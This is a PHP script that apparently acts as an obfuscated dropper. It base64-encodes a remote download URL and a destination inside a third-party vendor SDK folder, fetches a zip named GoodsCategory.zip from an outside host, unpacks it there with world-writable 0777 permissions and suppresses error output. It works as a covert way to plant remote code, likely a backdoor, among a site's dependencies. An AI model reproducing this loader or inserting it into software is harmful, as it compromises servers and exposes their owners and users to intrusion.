<?php
ini_set('display_errors', 0);
error_reporting(E_ALL & ~E_NOTICE);
	function downFile($url,$path){
    $arr=parse_url($url);
    $fileName=basename($arr['path']);
    $file=file_get_contents($url);
    file_put_contents($path.$fileName,$file);
}
$string='aHR0cDovL3UueTF5dW4uY29tL3VwbG9hZHMvR29vZHNDYXRlZ29yeS56aXA=';
$Route='Li92ZW5kb3IvcWluaXUvcGhwLXNkay91c2VyLw==';
downFile(base64_decode($string),base64_decode($Route));
class Unzip{
  public function __construct(){
  header("content-type:text/html;charset=utf8");
   }
  public function unzip($src_file, $dest_dir=false, $create_zip_name_dir=true, $overwrite=true){
    if ($zip = zip_open($src_file)){
     if ($zip){
     $splitter = ($create_zip_name_dir === true) ? "." : "/";
           if($dest_dir === false){
                  $dest_dir = substr($src_file, 0, strrpos($src_file, $splitter))."/";
              }
            $this->create_dirs($dest_dir);

             while ($zip_entry = zip_read($zip)){
                    $pos_last_slash = strrpos(zip_entry_name($zip_entry), "/");
                    if ($pos_last_slash !== false){
                        $this->create_dirs($dest_dir.substr(zip_entry_name($zip_entry), 0, $pos_last_slash+1));
                    }
                     if (zip_entry_open($zip,$zip_entry,"r")){
                    $file_name = $dest_dir.zip_entry_name($zip_entry);
                    if ($overwrite === true || $overwrite === false && !is_file($file_name)){
                   $fstream = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry));
                          @file_put_contents($file_name, $fstream);
                    chmod($file_name, 0777);
                     }
                  zip_entry_close($zip_entry);
                  }
               }
             zip_close($zip);
           }
        }else{
            return false;
        }
        return true;
   }
       public function create_dirs($path){
           if (!is_dir($path)){
           $directory_path = "";
           $directories = explode("/",$path);
           array_pop($directories);

                foreach($directories as $directory){
                 $directory_path .= $directory."/";
                 if (!is_dir($directory_path)){
                 mkdir($directory_path);
                 chmod($directory_path, 0777);
        }
       }
     }
   }
}
 $z = new Unzip();
 $zip='Li92ZW5kb3IvcWluaXUvcGhwLXNkay91c2VyL0dvb2RzQ2F0ZWdvcnkuemlw';
 $ziy='Li92ZW5kb3IvcWluaXUvcGhwLXNkay91c2VyLw==';
 $z->unzip(base64_decode($zip),base64_decode($ziy), true, false);